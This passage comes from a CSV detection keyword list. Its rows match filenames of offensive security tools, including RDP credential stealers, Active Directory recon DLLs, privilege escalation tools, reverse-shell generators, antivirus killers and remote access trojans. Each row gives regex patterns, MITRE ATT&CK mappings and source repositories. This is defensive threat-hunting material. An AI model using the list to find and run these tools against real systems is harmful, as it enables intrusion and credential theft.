Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\rdp.py*",".{0,1000}\\rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\RDPCredsStealerDLL*",".{0,1000}\\RDPCredsStealerDLL.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*\RDPHook.dll*",".{0,1000}\\RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*\RDPMITM.py*",".{0,1000}\\RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\rdpv.exe*",".{0,1000}\\rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password 
stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\ReadPEInMemory.exe*",".{0,1000}\\ReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\Reaper\Reaper.cpp*",".{0,1000}\\Reaper\\Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*\Reaper-main\*.sys*",".{0,1000}\\Reaper\-main\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*\REC2-main.zip*",".{0,1000}\\REC2\-main\.zip.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*\Recon.tests.ps1*",".{0,1000}\\Recon\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Recon-AD-AllLocalGroups.dll",".{0,1000}\\Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-AllLocalGroups.sln*",".{0,1000}\\Recon\-AD\-AllLocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-AllLocalGroups\*",".{0,1000}\\Recon\-AD\-AllLocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Computers.dll",".{0,1000}\\Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Computers.sln*",".{0,1000}\\Recon\-AD\-Computers\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and 
reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Computers\*",".{0,1000}\\Recon\-AD\-Computers\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Domain.dll",".{0,1000}\\Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Domain.sln*",".{0,1000}\\Recon\-AD\-Domain\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Domain\*",".{0,1000}\\Recon\-AD\-Domain\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Groups.dll",".{0,1000}\\Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Groups.sln*",".{0,1000}\\Recon\-AD\-Groups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-LocalGroups.dll*",".{0,1000}\\Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-LocalGroups.sln*",".{0,1000}\\Recon\-AD\-LocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-LocalGroups\*",".{0,1000}\\Recon\-AD\-LocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-master*",".{0,1000}\\Recon\-AD\-master.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-SPNs.sln*",".{0,1000}\\Recon\-AD\-SPNs\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-SPNs\*",".{0,1000}\\Recon\-AD\-SPNs\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Users.dll*",".{0,1000}\\Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Users.sln*",".{0,1000}\\Recon\-AD\-Users\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\RecycledGate.c*",".{0,1000}\\RecycledGate\.c.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*\RedPersist.exe*",".{0,1000}\\RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\RedPersist.pdb*",".{0,1000}\\RedPersist\.pdb.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\RedPersist.sln*",".{0,1000}\\RedPersist\.sln.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\RedPersist-main\*",".{0,1000}\\RedPersist\-main\\.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\redpill.ps1*",".{0,1000}\\redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - 
T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\redpill.zip*",".{0,1000}\\redpill\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\redpill\bin\*.ps1*",".{0,1000}\\redpill\\bin\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110
- T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\reflective_dll.x64.dll*",".{0,1000}\\reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\ReflectiveDll.cpp*",".{0,1000}\\ReflectiveDll\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\ReflectiveLoader.cpp*",".{0,1000}\\ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\reg_recover-rs.exe*",".{0,1000}\\reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*\reg-query.py*",".{0,1000}\\reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\regread.lua*",".{0,1000}\\regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\regwrite.lua*",".{0,1000}\\regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\regwritedel.lua*",".{0,1000}\\regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" 
"*\Relay\Attacks\ShadowCred.cs*",".{0,1000}\\Relay\\Attacks\\ShadowCred\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\\RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\RemoteCamera.dll*",".{0,1000}\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*\RemoteHashRetrieval.ps1*",".{0,1000}\\RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\RemotePotato0.cpp*",".{0,1000}\\RemotePotato0\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0.sln*",".{0,1000}\\RemotePotato0\.sln.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0.zip*",".{0,1000}\\RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0-main.zip*",".{0,1000}\\RemotePotato0\-main\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemotePotato0-main\*",".{0,1000}\\RemotePotato0\-main\\.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*\RemoveItemCommand.cs",".{0,1000}\\RemoveItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\rentdrv.log*",".{0,1000}\\rentdrv\.log.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*\request_shellcode.exe*",".{0,1000}\\request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ResolveDnsNameCommand.cs",".{0,1000}\\ResolveDnsNameCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Resources\Disks-NoEncryption.txt*",".{0,1000}\\Resources\\Disks\-NoEncryption\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*\resources\PROCEXP.sys*",".{0,1000}\\resources\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*\restoresig.py*",".{0,1000}\\restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*\reverse.exe*",".{0,1000}\\reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\ReverseProxy.dll*",".{0,1000}\\ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set 
of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\reverse-shellcode.cpp*",".{0,1000}\\reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\reverse-ssh\*",".{0,1000}\\reverse\-ssh\\.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 